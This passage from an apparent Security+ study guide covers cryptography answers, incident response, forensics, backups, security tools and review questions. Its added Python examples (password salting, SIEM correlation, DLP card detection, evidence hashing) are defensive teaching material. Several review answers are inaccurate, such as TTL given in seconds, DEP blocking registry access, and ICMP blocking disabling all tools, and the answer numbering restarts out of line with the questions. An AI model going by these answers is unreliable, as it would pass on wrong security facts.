  34. Elliptic curve cryptography is used to encrypt data on a smartphone, as its keys are small and fast, and it uses the elliptic curve Diffie-Hellman (ECDH) handshake.

  35. AES-256 is used to encrypt a military mobile telephone.

  36. Two key-stretching algorithms are bcrypt and PBKDF2.

  37. Key stretching runs the password through a slow, repeated function (many thousands of iterations of a hash) so that each guess costs an attacker far more effort, which makes brute-force attacks impractical. It is normally used together with a salt (see question 59), but the two are separate controls.

  38. A stream cipher encrypts one bit at a time; a block cipher takes fixed-size blocks of data, for example 128-bit blocks. A block cipher is used for large amounts of data.

  39. Cipher block chaining XORs each plaintext block with the previous ciphertext block before encryption, so decrypting a block needs the ciphertext block before it. If blocks are missing or corrupted, that block and the one after it cannot be recovered, so the full plaintext cannot be reconstructed.

  40. Hashing ensures the integrity of data; two examples are SHA-1 (160-bit) and MD5 (128-bit). Both are now considered broken for collision resistance, so SHA-256 or stronger should be used in new designs.

  41. Encryption is used to protect data so that it cannot be read or accessed without the key.

  42. A hash is a one-way function and cannot be reversed.

  43. POODLE is a man-in-the-middle attack on a connection downgraded to SSL 3.0 with CBC mode.

  44. DHE and ECDHE generate ephemeral keys: short-lived, one-time keys for each session, which gives perfect forward secrecy.

  45. The strongest encryption for an L2TP/IPSec VPN tunnel is AES and the weakest is DES.

  46. A session key ensures the security of communications between a computer and a server or between two computers.

  47. Data-at-rest on a laptop is protected by full disk encryption (FDE).

  48. Data-at-rest on a tablet or smartphone is protected by full device encryption.

  49. Data-at-rest on a backend server is stored in a database, so it needs database encryption.

  50. Data-at-rest on a USB flash drive or external hard drive is protected by full disk encryption.

  51. Data-in-transit can be secured using TLS, HTTPS, or an L2TP/IPSec tunnel.

  52. Data-in-use can be protected by full memory encryption.

  53. Obfuscation is used to make source code obscure so that, if it is stolen, it cannot easily be understood.

  54. Perfect forward secrecy ensures that there is no link between the server's long-term private key and the session key. If the VPN server's key were compromised later, it could not be used to decrypt previously captured sessions.

  55. A collision attack tries to find two different inputs that produce the same hash value.

  56. Rainbow tables are precomputed lists of passwords and their hash values. You would use one set of tables for MD5 and a different set for SHA-1; a salt defeats them because the table would have to be rebuilt for every salt value.

  57. Steganography is used to conceal data; you can hide a file, whether image, video, or audio, inside another image, video, or audio file.

  58. DLP prevents sensitive or PII data from being emailed out of a company or stolen from a file server using a USB device.

  59. Salting a password adds a random value to it before hashing, so that two users with the same password are stored as different hashes and precomputed rainbow tables cannot be used against them. Salting is usually combined with key stretching, which is what makes brute-force attacks slow.
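The answers on key stretching (36 and 37), rainbow tables (56), and salting (59) describe three related ideas; the following added example, which is not from the book, shows them working together with the standard library. The tiny precomputed dictionary stands in for a real rainbow table, and the password list is constructed for the demo.

```python
# Added example: unsalted hashes fall to a precomputed table; a random salt
# plus PBKDF2 iterations (key stretching) defeats it and slows every guess.
import hashlib
import hmac
import os

COMMON_PASSWORDS = ["password", "123456", "letmein", "qwerty"]  # constructed sample


def unsalted_hash(password: str) -> str:
    """What a naive application stores: sha256(password), no salt, one iteration."""
    return hashlib.sha256(password.encode()).hexdigest()


# Precomputation stage: the attacker hashes common passwords once, in advance.
PRECOMPUTED = {unsalted_hash(p): p for p in COMMON_PASSWORDS}


def lookup_unsalted(stored_hash: str):
    """One dictionary lookup recovers an unsalted hash of a common password."""
    return PRECOMPUTED.get(stored_hash)


def hash_password(password: str, salt: bytes = None, iterations: int = 200_000):
    """Salted and stretched: PBKDF2-HMAC-SHA256 with a random 16-byte salt.
    Returns (salt, derived_key); store both, the salt is not secret. The
    iteration count is the stretching: every guess costs the attacker that
    many HMAC calls."""
    if salt is None:
        salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, key


def verify_password(password: str, salt: bytes, stored_key: bytes,
                    iterations: int = 200_000) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, stored_key)  # constant-time compare


def same_password_different_hashes(password: str, iterations: int = 1000) -> bool:
    """Two users with the same password get different stored values, so a
    table built for one salt is useless for every other salt."""
    _, k1 = hash_password(password, iterations=iterations)
    _, k2 = hash_password(password, iterations=iterations)
    return k1 != k2


if __name__ == "__main__":
    print(lookup_unsalted(unsalted_hash("letmein")))   # cracked instantly
    salt, key = hash_password("letmein")
    print(lookup_unsalted(key.hex()))                   # None: table is useless
    print(verify_password("letmein", salt, key))        # True
    print(same_password_different_hashes("letmein"))    # True
```

Raise the iteration count until verification takes tens of milliseconds on your own hardware; that cost is paid once per login but billions of times by an attacker.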

Responding to Security Incidents

In this chapter, we will be looking at incident response, particularly with regard to the collection of volatile evidence for forensic analysis.

We will cover the following exam objectives in this chapter:

Incident response procedures

There are many different kinds of incident, and each needs its own incident response plan: dealing with a flood is totally different from dealing with the failure of a server's hardware. Once an incident has been identified, the first action is to collect any volatile evidence so that the source of the incident can be determined, followed by containment of the incident itself and then the recovery procedures. Let's look in more detail at the components required to make incident response successful:

Incident response process

While responding to an incident, the following processes are followed:


Figure 1: Incident response process

Exam tip: 
Lessons learned is a detective control where the incident is reviewed and changes are made to prevent it happening again.

Understanding the basic concepts of forensics

Forensics is used by the police when they are investigating crimes and need to find as much evidence as they can to secure a conviction; here we apply the same discipline to computer and web-based attacks. There are many different components, so we will look at each of these in turn:

Exam tip: 
Order of volatility is collecting the most perishable evidence first.

Five minute practical

Open a command prompt on your computer and type netstat -an. You should now see the listening and established ports; count them and write the numbers down. Run shutdown /r /t 0 to reboot the machine immediately. Log back in, open the command prompt again, and run netstat -an; what is the difference? The established connections are gone: information that could have been used as evidence has been lost, which is why volatile evidence is collected before anything is powered off or rebooted.

Volatile evidence summary

Attack type         Collect first
Web-based attack    Capture network traffic
Computer attack     CPU cache, then RAM
Removable drive     Volatile memory (RAM)
Command line        netstat -an

Exam tip: 
Capturing the network traffic is the first step in remote or web-based attacks so that you can identify the source.

Date          From         To               Evidence
1st August    Sgt Smith    Sgt Jones        15 kg cocaine
2nd August    Sgt Jones    Property room    14 kg cocaine

In this chain, 1 kg of evidence went missing while Sgt Jones held it, so the break must be investigated before the evidence can be relied on in court.

Exam tip: 
Chain of custody must show who has handled the evidence, and when, from collection until it is presented to the courts. The evidence must not leave the possession of the person who has signed for it; if it does, the break must be investigated.

Example: Dr. Death has been prescribing new drugs to patients in a large hospital who have been dying. An auditor has been sent to investigate the possibility of foul play, and then following the audit, the FBI are notified. The doctor has been emailing a pharmaceutical company that has been supplying the drugs for a trial. The FBI does not want the doctor to be alerted, so they have the hospital's IT Team put his mailbox on legal hold. When the mailbox is on legal hold, the mailbox limit is lifted; the doctor can still send and receive email, but cannot delete anything. This way, he is not alerted to the fact that he is under investigation.

Exam tip: 
Recording the time offset is used for time normalization across multiple time zones.

Example: The police in three separate countries are trying to identify where the data in a chain started, and then who handled it along the line. They have the following local creation times:

New York: created 3 a.m.

London: created 4 a.m.

Berlin: created 4.30 a.m.

Without recording each system's time offset, it looks as if the data started in New York, because 3 a.m. is the earliest clock time. Once the regional offsets are applied the picture changes: when it is 4 a.m. in London it is 11 p.m. the previous day in New York, so the New York copy is actually the newest; and when it is 4.30 a.m. in Berlin it is only 3.30 a.m. in London, so the Berlin copy is older than the London one. Converted to a common reference, the data originated in Berlin, the site that looked least likely before the offsets were applied.
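The same normalization done in code, as an added example that is not from the book: each creation time is combined with the UTC offset recorded from that system and converted to UTC, and the earliest UTC time identifies the origin. The offsets are assumptions for a date in August (New York EDT = UTC-4, London BST = UTC+1, Berlin CEST = UTC+2); in a real case, recording each machine's actual clock offset is the first step.

```python
# Added example: time normalization across time zones using the standard library.
from datetime import datetime, timedelta, timezone

# Constructed evidence records: (site, local creation time, recorded UTC offset in hours)
RECORDS = [
    ("New York", "2019-08-01 03:00", -4),
    ("London",   "2019-08-01 04:00", +1),
    ("Berlin",   "2019-08-01 04:30", +2),
]


def to_utc(local: str, offset_hours: int) -> datetime:
    """Attach the recorded offset to the naive local timestamp, then convert to UTC."""
    tz = timezone(timedelta(hours=offset_hours))
    naive = datetime.strptime(local, "%Y-%m-%d %H:%M")
    return naive.replace(tzinfo=tz).astimezone(timezone.utc)


def order_by_utc(records):
    """Return (site, UTC time) pairs, earliest first."""
    normalised = [(site, to_utc(local, off)) for site, local, off in records]
    return sorted(normalised, key=lambda item: item[1])


def origin(records) -> str:
    """The site whose copy is oldest in UTC is where the data started."""
    return order_by_utc(records)[0][0]


if __name__ == "__main__":
    for site, utc in order_by_utc(RECORDS):
        print(f"{site:9} {utc:%Y-%m-%d %H:%M} UTC")
    print("Origin:", origin(RECORDS))
```

Berlin normalizes to 02:30 UTC, London to 03:00 UTC and New York to 07:00 UTC the same day, so the comparison that looked wrong on local clocks becomes obvious once every timestamp is in one reference.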

Exam tip: 
Taking a system image or a forensic copy of a hard drive is the first stage in forensic investigation.

Exam tip:
Hashing data before and after investigation can prove data integrity.
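The two exam tips above, and the chain-of-custody table earlier in this section, come together in the following added example, which is not from the book: a small custody log that records each hand-over, reports any hand-over that did not come from the person who last signed for the evidence, and compares the hash taken when the image was acquired with the hash taken at the end of the investigation. The evidence bytes and the names are constructed.

```python
# Added example: chain-of-custody continuity check plus before/after hashing.
import hashlib

# Constructed stand-in for a forensic disk image
ACQUIRED_IMAGE = b"\x00" * 1024 + b"disk image bytes, constructed for the example"


def fingerprint(data: bytes) -> str:
    """SHA-256 of the evidence; taken at acquisition and again when finished."""
    return hashlib.sha256(data).hexdigest()


class CustodyLog:
    def __init__(self, description: str, evidence: bytes):
        self.description = description
        self.acquisition_hash = fingerprint(evidence)
        self.transfers = []  # (date, handed over by, signed for by)

    def transfer(self, date: str, giver: str, receiver: str) -> None:
        self.transfers.append((date, giver, receiver))

    def breaks(self):
        """Each hand-over must come from whoever signed for the evidence last;
        anything else is a break in the chain that has to be investigated."""
        problems = []
        for prev, cur in zip(self.transfers, self.transfers[1:]):
            date, giver, _ = cur
            if giver != prev[2]:
                problems.append(f"{date}: {giver} handed over evidence last signed for by {prev[2]}")
        return problems

    def integrity_ok(self, evidence_now: bytes) -> bool:
        """True if the image is bit-for-bit what was acquired."""
        return fingerprint(evidence_now) == self.acquisition_hash


if __name__ == "__main__":
    log = CustodyLog("laptop disk image", ACQUIRED_IMAGE)
    log.transfer("1st August", "Sgt Smith", "Sgt Jones")
    log.transfer("2nd August", "Sgt Brown", "Property room")  # Brown never signed for it
    print(log.breaks())
    print(log.integrity_ok(ACQUIRED_IMAGE))            # True
    print(log.integrity_ok(ACQUIRED_IMAGE + b"\x01"))  # False: image altered
```

In practice the hash is computed over the image file in chunks rather than from a bytes object, and both the hash and the custody entries go in the case file that is presented with the evidence.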

Example: Your company uses an account lockout threshold of three attempts. If an attacker tries to log in as the same user once on each of three separate computers, no single computer identifies it as an attack, because each one sees only one failed attempt; a SIEM system, which collects the logs from all three, would correlate them as three failed login attempts for one account and alert the administrators in real time.
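The correlation that the SIEM performs in that example, as an added example that is not from the book, run over constructed log lines in a simple "timestamp host user result" form. Each host sees one failure, below its lockout threshold of three; the aggregated view sees three failures for one account inside a five-minute window and raises an alert.

```python
# Added example: cross-host failed-login correlation of the kind a SIEM rule does.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: timestamp host user result
SAMPLE_LOGS = """\
2019-08-01T09:00:05 PC01 jsmith FAIL
2019-08-01T09:00:41 PC02 jsmith FAIL
2019-08-01T09:01:12 FS01 mjones SUCCESS
2019-08-01T09:01:30 PC03 jsmith FAIL
2019-08-01T09:45:00 PC07 mjones FAIL
"""


def parse(log_text: str):
    events = []
    for line in log_text.splitlines():
        ts, host, user, result = line.split()
        events.append((datetime.fromisoformat(ts), host, user, result))
    return events


def hosts_that_would_lock(events, threshold: int = 3):
    """What each endpoint sees on its own: failures per (host, user)."""
    counts = defaultdict(int)
    for _, host, user, result in events:
        if result == "FAIL":
            counts[(host, user)] += 1
    return [key for key, n in counts.items() if n >= threshold]


def correlate_failed_logins(events, threshold: int = 3,
                            window: timedelta = timedelta(minutes=5)):
    """What the SIEM sees: per user, `threshold` failures from any hosts
    within `window`. Returns (user, hosts, first_time, last_time) per alert."""
    per_user = defaultdict(list)
    for ts, host, user, result in sorted(events):
        if result == "FAIL":
            per_user[user].append((ts, host))
    alerts = []
    for user, fails in per_user.items():
        for i in range(len(fails) - threshold + 1):
            chunk = fails[i:i + threshold]
            if chunk[-1][0] - chunk[0][0] <= window:
                hosts = sorted({h for _, h in chunk})
                alerts.append((user, hosts, chunk[0][0], chunk[-1][0]))
                break  # one alert per user is enough here
    return alerts


if __name__ == "__main__":
    evts = parse(SAMPLE_LOGS)
    print("Per-host lockouts:", hosts_that_would_lock(evts))   # none
    for user, hosts, first, last in correlate_failed_logins(evts):
        print(f"ALERT {user}: {len(hosts)} failures across {hosts} "
              f"between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

The window matters: mjones fails once at 09:45, far from any other failure, so no alert is raised for that account and the rule does not fire on ordinary typos.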

Exam tip:
Re-imaging computers and restoring data is part of the recovery phase.

Software tools to assess the security posture of an organization

Security teams are constantly under attack from cyber criminals and threat actors, and therefore they need to be able to use a mixture of different security tools so that they can identify attacks before they have a chance to cause grave damage to the business. We will now look at each of these tools to see the benefits of each:

Example: Someone within the company is not doing the work they should be but has been surfing the web, and the manager has called you in as the security administrator to gather evidence. You decide that a protocol analyzer, or packet sniffer, is the best tool to collect the information. You run a Wireshark session and capture the visits to the NFL website. When you analyze the trace, you notice that the request uses the HTTP GET verb; this is the request for a page on www.nfl.com. Drilling further into the request, we can see it is for a page with an article, Josh Hobbs and Mike Glennon drawing trade interest, as shown here. Note that this level of detail is visible only because the site was reached over plain HTTP; over HTTPS the capture would show the host name (from DNS and the TLS handshake) but not the page requested:


Figure 2: Protocol analyzer

Exam tip: A protocol analyzer can identify the operating system of a host from the characteristics of its traffic and, where the traffic is unencrypted, the commands being sent across the network to an application.


Figure 3: Network scanner

Exam tip: A network mapper can identify the operating systems and services running on a computer.

A vulnerability scanner checks for known weaknesses but does not exploit them, so it does not damage the systems it scans. An example is Microsoft Baseline Security Analyzer (MBSA); see the following screenshot. Although the computer was fully patched, because this was a credentialed scan it still reported configuration findings:


Figure 4: Credentialed vulnerability scan

Exam tip: A credentialed vulnerability scanner can audit files and examine permissions.

Exam tip: A compliance scanner can ensure that all of the settings on computers are compliant and as they should be.

Backup utilities

Backing up data is very important so that, if the systems fail, a copy of the data can be obtained from a previous backup. A company cannot put a price on its most critical data, and losing it would cause grave damage, especially if the data belonged to the Finance department or to Research and Development, which produces the prototypes of new products.

There are various ways that we can back up the data—we can take snapshots of virtual machines, back up to a network, back up to tape, or a removable device. Let's look at these in turn.

Exam tip: A honeypot can be used to track the attack methods being used against websites.

Backup types

There are various types of backups and these are full, incremental, and differential. Let's look at these in turn:

Example: We will compare the different types of backup. We back up at the end of each day from Monday to Thursday and suffer data loss on the Friday, and we will see how many tapes we need to recover our data. Our full backup is 50 GB of data, and each day we produce 5 GB of new data. The following chart shows how much each scheme writes every day and how many tapes are needed to recover your data:

Full: Every tape holds everything, so the latest full backup is 65 GB and each day's backup is larger than the last; recovery needs only the most recent tape.

Backup             Mon       Tues      Wed       Thurs     Fri   Tapes to recover
Full (F)           F 50 GB   F 55 GB   F 60 GB   F 65 GB   X     1: F 65 GB (Thurs)
Incremental (I)    F 50 GB   I 5 GB    I 5 GB    I 5 GB    X     4: F 50 GB (Mon) + 3 x I (Tues, Wed, Thurs)
Differential (D)   F 50 GB   D 5 GB    D 10 GB   D 15 GB   X     2: F 50 GB (Mon) + D 15 GB (Thurs)
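The restore sets in the table, computed rather than read off, as an added example that is not from the book. It uses the 50 GB full and 5 GB per day from the example and generalises to any number of days: change DAYS or DAILY_GB and the restore sets, and the amount of tape written under each scheme, follow.

```python
# Added example: which tapes a restore needs under full, incremental and
# differential schemes, given the backup days before the loss.
DAYS = ["Mon", "Tues", "Wed", "Thurs"]  # tapes written before the Friday loss
FULL_GB, DAILY_GB = 50, 5


def schedule(kind: str):
    """Tapes written under a scheme as (day, label, size_gb)."""
    tapes = []
    for i, day in enumerate(DAYS):
        if kind == "full" or i == 0:
            tapes.append((day, "F", FULL_GB + i * DAILY_GB))   # everything so far
        elif kind == "incremental":
            tapes.append((day, "I", DAILY_GB))                 # since the last backup of any kind
        elif kind == "differential":
            tapes.append((day, "D", i * DAILY_GB))             # since the last full
        else:
            raise ValueError(f"unknown scheme {kind!r}")
    return tapes


def restore_set(kind: str):
    """Tapes needed to recover to the latest backup: the last full, plus every
    incremental after it, or only the newest differential."""
    tapes = schedule(kind)
    last_full = max(i for i, t in enumerate(tapes) if t[1] == "F")
    if tapes[-1][1] == "F":
        return [tapes[-1]]
    if kind == "incremental":
        return tapes[last_full:]
    return [tapes[last_full], tapes[-1]]


def gb_written(kind: str) -> int:
    """Total tape written over the week: the cost you pay every day."""
    return sum(size for _, _, size in schedule(kind))


def gb_read_to_restore(kind: str) -> int:
    """Total tape read back on the Friday: the cost you pay once."""
    return sum(size for _, _, size in restore_set(kind))


if __name__ == "__main__":
    for kind in ("full", "incremental", "differential"):
        tapes = restore_set(kind)
        print(f"{kind:13} restore from {len(tapes)} tape(s): "
              f"{[f'{d} {l} {s} GB' for d, l, s in tapes]}, "
              f"written {gb_written(kind)} GB, read {gb_read_to_restore(kind)} GB")
```

All three schemes read the same 65 GB back on the Friday; they differ in how many tapes must be present and intact (one, four, or two) and in how much is written each day, which is the trade-off between backup time and restore risk.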

Exam tip: Symptoms of steganography are that an image looks lighter or faded, or a file is larger than it should be.

Command-line tools

Command-line tools are used every day by security professionals, so for the Security+ exam you must be familiar with them; I have provided a screenshot for many of them. We are going to see when we would use each of these in turn:


Figure 5: Ping


Figure 6: Continuous ping


Figure 7: Netstat


Figure 8: Tracert

Exam tip: netstat shows the established and listening ports, but if you reboot the computer the established connections disappear.


Figure 9: Nslookup


Figure 10: Dig


Figure 11: ARP

The ipconfig /displaydns command is run in the following screenshot, and it shows the DNS cache on a computer:


Figure 12: DNS cache

ipconfig /flushdns is used to clear all entries from the DNS cache; see the following screenshot:


Figure 13: Clear DNS cache

tcpdump -i eth0 captures and displays the packets passing through the interface eth0, usually the first Ethernet adapter on a Linux host, as shown in the following screenshot:


Figure 14: tcpdump


Figure 15: Netcat

Analyzing and interpreting output from security technologies

There are various applications that security administrators can use to analyze and stop various attacks. Let's look at these here:


Figure 16: HIDS output


Figure 17: Quarantined viruses

The following screenshot shows a scan for sensitive documents held on a desktop, and you can see that 135 documents have been found. We may need to install Data Loss Prevention (DLP) to protect these:


Figure 18: Sensitive documents scan


Figure 19: System file checker


Figure 20: Host-based firewall


Figure 21: Application whitelisting


Figure 22: Removable media policies

Exam tip: Applications must be added to the whitelist before they are approved for use.


Figure 23: Sophos UTM 9


Example: We wish to set up a template to prevent Visa, Mastercard, Diners Club, JCB, Discover, and American Express details from being emailed out. This is done by creating a template that consists of a regular expression. Should the pattern be matched, the email will be blocked and an administrator will be notified. The regular expression is shown here:


Figure 24: Regular expression for credit cards
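A pattern of the kind that template uses, as an added example that is not from the book. The regular expression below is mine, not the one shown in Figure 24; it matches the common formats for the six card brands named above, and a Luhn check removes most false positives from order references and phone numbers that happen to have the right number of digits. The message text is constructed.

```python
# Added example: DLP detection of card numbers by brand pattern plus Luhn check.
import re

# Brand prefixes: Visa 4; Mastercard 51-55 or 2221-2720; American Express 34/37;
# Diners Club 300-305/36/38; Discover 6011/65; JCB 3528-3589.
# Groups of digits may be separated by a space or a hyphen.
CARD_RE = re.compile(r"""
    (?<!\d)
    (?:
        4\d{3}(?:[ -]?\d{4}){3}                                   # Visa, 16 digits
      | (?:5[1-5]\d{2}|2(?:22[1-9]|2[3-9]\d|[3-6]\d{2}|7[01]\d|720))
            (?:[ -]?\d{4}){3}                                     # Mastercard, 16 digits
      | 3[47]\d{2}[ -]?\d{6}[ -]?\d{5}                            # American Express, 15 digits
      | 3(?:0[0-5]|[68]\d)\d[ -]?\d{6}[ -]?\d{4}                  # Diners Club, 14 digits
      | 6(?:011|5\d{2})(?:[ -]?\d{4}){3}                          # Discover, 16 digits
      | 35(?:2[89]|[3-8]\d)(?:[ -]?\d{4}){3}                      # JCB, 16 digits
    )
    (?!\d)
""", re.VERBOSE)


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: doubles every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        n = int(ch)
        if i % 2 == 1:
            n *= 2
            if n > 9:
                n -= 9
        total += n
    return total % 10 == 0


def find_card_numbers(text: str):
    """Card numbers (digits only) that match a brand pattern and pass Luhn."""
    found = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits):
            found.append(digits)
    return found


def should_block(text: str) -> bool:
    """The DLP decision: block the email if any card number is present."""
    return bool(find_card_numbers(text))


if __name__ == "__main__":
    # Constructed message: one real-format Visa, one lookalike that fails Luhn,
    # one American Express, and a UK phone number.
    msg = ("Card 4111-1111-1111-1111, ref 4111111111111112, "
           "amex 378282246310005, tel 0161 496 0000")
    print(find_card_numbers(msg))
    print(should_block(msg))
```

The lookbehind and lookahead stop the pattern matching inside longer digit runs, and the Luhn check is what keeps the rule from blocking every sixteen-digit reference number; real DLP products add the same kind of validator behind their regular expressions for exactly that reason.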


Figure 25: Data execution prevention


Figure 26: WAF log file

Review questions

  1. What is the purpose of an incident response plan?

  2. Name three different categories of incidents.

  3. Name three different types of roles required to deal with an incident.

  4. What should the Help Desk do when an incident has just been reported?

  5. What is the purpose of an incident response exercise?

  6. What is the first phase of the incident response process and what happens there?

  7. What is the last phase of the incident response process?

  8. What would happen if the last process of the incident response process is not carried out?

  9. What is order of volatility?

  10. What is the first action I should take if my company suffers a web-based or remote attack?

  11. What should I do if I find a USB flash drive in one of the servers?

  12. What is the process of chain of custody and why would you investigate it?

  13. What is the purpose of legal hold?

  14. What is the purpose of record time offset and what purpose does it provide?

  15. What is the first stage a forensics officer should carry out when he has just taken possession of a laptop computer?

  16. What is the first stage a forensics officer should carry out when he has just taken possession of a hard drive or removable drive?

  17. Why would a forensics officer take hashes of data before he starts his investigation?

  18. What are the benefits of a security administrator using a SIEM system?

  19. Can I delete data that I have copies of on a WORM drive?

  20. Why would we carry out active monitoring?

  21. What tools can I use to find the operating system running on a computer?

  22. If I am using an unencrypted media package that runs across my network, how can I capture the passwords?

  23. If I want to find information about the operating system of a remote web server, what is the best tool to use?

  24. What is the purpose of a network mapper?

  25. If I have disabled the SSID on my wireless access point, can someone still find the SSID?

  26. What type of vulnerability scanner can audit files and find out account vulnerabilities?

  27. What is the most basic vulnerability scanner that can only find missing patches?

  28. What tools can I use to ensure that the settings on my server are correct?

  29. What is the purpose of using the technique of steganography?

  30. How can I find the attack method a hacker would use to exploit my website?

  31. What is the quickest form of backup?

  32. What is the quickest form of tape backup?

  33. What are the most common types of backup? Name two.

  34. How many tapes would I need to recover my data if I use a differential backup?

  35. What would happen to command-line troubleshooting tools if I blocked incoming ICMP on the network firewall?

  36. What tool is used to test connectivity and what command would you use to make it continuous?

  37. What is normally the maximum value of a packet's TTL?

  38. What does the command-line tool netstat -an provide and what would happen if I rebooted the computer?

  39. What tool can I use in a Windows environment to verify the hostname entry in the DNS server?

  40. What are the commands to display the DNS cache and then clear all entries from it?

  41. What command-line tool displays the route to a remote web server?

  42. What is a packet tracing tool used in a Linux/Unix environment?

  43. What is the command-line tool to show the session between two hosts in a Linux/Unix environment?

  44. What is the purpose of a file integrity checker?

  45. If an application is neither on the blacklist nor the whitelist, how can I ensure that I can install it on my computer?

  46. How could I prevent 4,000 people from installing USB flash drives on their computers?

  47. What tool is a firewall that can URL filter, content filter, and provide malware inspection?

  48. What tool can prevent PII and sensitive data from leaving your network via email or from being copied onto a USB flash drive?

  49. What is the tool that can prevent malicious programs from accessing the registry?

  50. What tool would you use to prevent an attack on a web-based application?



Answers and explanations

  1. An incident response plan is written for a particular incident and lays out how it should be tackled and the key personnel required.

  2. The different categories of incidents are as follows:

  3. The different roles required to deal with an incident are as follows:

  4. The help desk identifies the incident response plan required and the key personnel that need to be notified.

  5. An incident response exercise rehearses the incident response plan so that any shortfalls in it, or in the people who have to carry it out, are found before a real incident.

  6. The first phase of the incident response process is the preparation phase where the plan is already written in advance of any attack.

  7. The last phase of the incident response process is lessons learned where we review why the incident was successful.

  8. If we do not carry out lessons learned, the incident may re-occur. Lessons learned is a detective control where we try to identify and repair any weaknesses.

  9. Collecting the most volatile evidence first.

  10. The first action would be to capture the network traffic so that we can identify the source of the attack.

  11. You should collect the data in the volatile memory first.

  1. Chain of custody lists who has handled the evidence before it goes to court. Any break in the chain or the evidence leaving your site is a breach of the chain of custody and the judge would ask for it to be investigated.

  2. Legal Hold is a process to ensure the securing data so it cannot be deleted, for example putting someone's mailbox on hold. This is sometimes called litigation hold. 

  3. Record time offset is used for time normalization across multiple time zones.

  4. He should take a system image so that it can be used for investigation.

  5. He should take a forensic copy so that it can be used for investigation.

  6. To ensure that when he is finished that he can prove integrity of the data.

  7. A SIEM system can be used to correlate logs from multiple places and give real time reporting of incidents.

  8. Data cannot be deleted from a WORM drive, as it is write-once, read many.

  9. Active monitoring is used to identify an incident in real time.

  10. You can use a protocol analyzer to find the operating system running on a computer.

  11. You can use a protocol analyzer to capture the data and command going to a network-based application.

  12. Banner grabbing is the best tool to use if you want to find information about the operating system of a remote web server.

  13. A network mapper can identify all hosts on your network, their patch level, and any services running on them.

  14. You can use a wireless packet sniffer or a SSID de-cloak device to find the SSID of your WAP, as it is embedded in the network traffic going to the WPA.

  15. A credentialed vulnerability scanner can audit files and find out account vulnerabilities.

  16. A non-credentialed vulnerability scanner that can only find missing patches.

  17. A compliance scanner ensures that the settings on your server are correct.

  18. Steganography allows you to hide a file, audio, video, or image inside another file, audio, video, or image. You may notice a larger file or a faded image.

  19. You would set up a honeypot to find the attack method a hacker would use to exploit your website.

  20. The quickest form of backup is a snapshot of a virtual machine.

  21. The quickest form of tape backup is a full backup, as all backups need a full backup to start with.

  22. The two most common tape backups are full and incremental.

  23. You will need two tapes to perform a differential backup.

  24. If incoming ICMP was blocked on the network firewall, none of your command-line tools would work, as ICMP brings back the replies.

  25. Ping is the tool that is used to test connectivity and the command ping -t is used for continuous ping.

  26. The normal maximum value of a packet's TTL is 128 seconds or less.

  27. netstat -an shows listening and established ports. If you reboot your computer, the established sessions will disappear.

  28. nslookup is used in a Windows environment to verify the hostname entry on the DNS server; dig is the Unix/Linux equivalent.

  29. ipconfig /displaydns displays the DNS cache and ipconfig /flushdns clears all entries.

  30. Tracert is used to display the route to a remote web server over a maximum of 30 hops.

  31. tcpdump is a packet tracer used in a Linux/Unix environment.

  32. Netcat or nc shows the session between two hosts in a Linux/Unix environment.

  33. A file integrity checker can determine whether a file has been altered by an application or is corrupt.

  34. If an application is on neither the blacklist nor the whitelist, you need to add it to the whitelist so that you can install it on your computer.

  35. You can use group policy to prevent 4,000 people from installing USB flash drives on their computers.

  36. A UTM is a firewall that can perform URL filtering, content filtering, and malware inspection.

  37. DLP can prevent PII and sensitive data from leaving your network via email or from being copied onto a USB flash drive.

  38. DEP can prevent malicious programs from accessing the registry by restricting the area that programs can access.

  39. A web application firewall can prevent an attack on a web-based application.
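The answers above on proving the integrity of a forensic copy and on file integrity checkers both come down to the same workflow: hash each item when it is collected, keep the digests, and re-hash later to show nothing has changed. The Python example below is added here to show that workflow end to end; it is not from the book or its author. It writes two constructed sample files (stand-ins for a disk image and a log, not real evidence), records their SHA-256 digests in a manifest at collection time, verifies them, and then shows that a single byte appended to one file is reported as a mismatch. The file names and contents are assumptions made for the demonstration.

```python
import hashlib
import os
import tempfile

CHUNK = 1 << 20  # read evidence in 1 MiB chunks so a large image never has to fit in RAM


def sha256_file(path):
    """Return the hex SHA-256 digest of a file, streamed in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(paths):
    """Record the digest of each collected item. Written once, at collection time."""
    return {os.path.basename(p): sha256_file(p) for p in paths}


def verify_manifest(manifest, directory):
    """Re-hash every item and return the names whose digest no longer matches."""
    mismatches = []
    for name, expected in manifest.items():
        actual = sha256_file(os.path.join(directory, name))
        if actual != expected:
            mismatches.append(name)
    return mismatches


def hash_bytes_as_file(data):
    """Helper that writes bytes to a temporary file and hashes it (used to check a known vector)."""
    path = os.path.join(tempfile.mkdtemp(), "sample.bin")
    with open(path, "wb") as f:
        f.write(data)
    return sha256_file(path)


def demo():
    """Constructed scenario: collect two evidence files, verify them, then detect tampering."""
    workdir = tempfile.mkdtemp()
    img = os.path.join(workdir, "server1-disk.img")   # assumed name, not a real image
    log = os.path.join(workdir, "server1-syslog.txt")  # assumed name, constructed content
    with open(img, "wb") as f:
        f.write(os.urandom(3 * CHUNK + 17))  # random filler standing in for image data
    with open(log, "w") as f:
        f.write("Jan 01 00:00:01 server1 sshd[1]: Accepted publickey for admin\n")  # constructed log line

    manifest = build_manifest([img, log])
    clean = verify_manifest(manifest, workdir)  # nothing changed yet: []

    # Simulate an alteration after collection: one byte appended to the log.
    with open(log, "a") as f:
        f.write("x")
    tampered = verify_manifest(manifest, workdir)  # ["server1-syslog.txt"]
    return clean, tampered


if __name__ == "__main__":
    before, after = demo()
    print("mismatches before tampering:", before)
    print("mismatches after tampering:", after)
```

The manifest itself is the thing you would sign, print and attach to the chain of custody form; the digests mean nothing unless they were recorded before anyone else handled the media.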

Managing Business Continuity

In this chapter, we will be looking at how our business environment provides system availability and at selecting the most appropriate disaster recovery method following a disaster. This will be broken down into four distinct sections, and you must understand each of them:

We will cover the following topics in this chapter: 

Implementing secure systems design

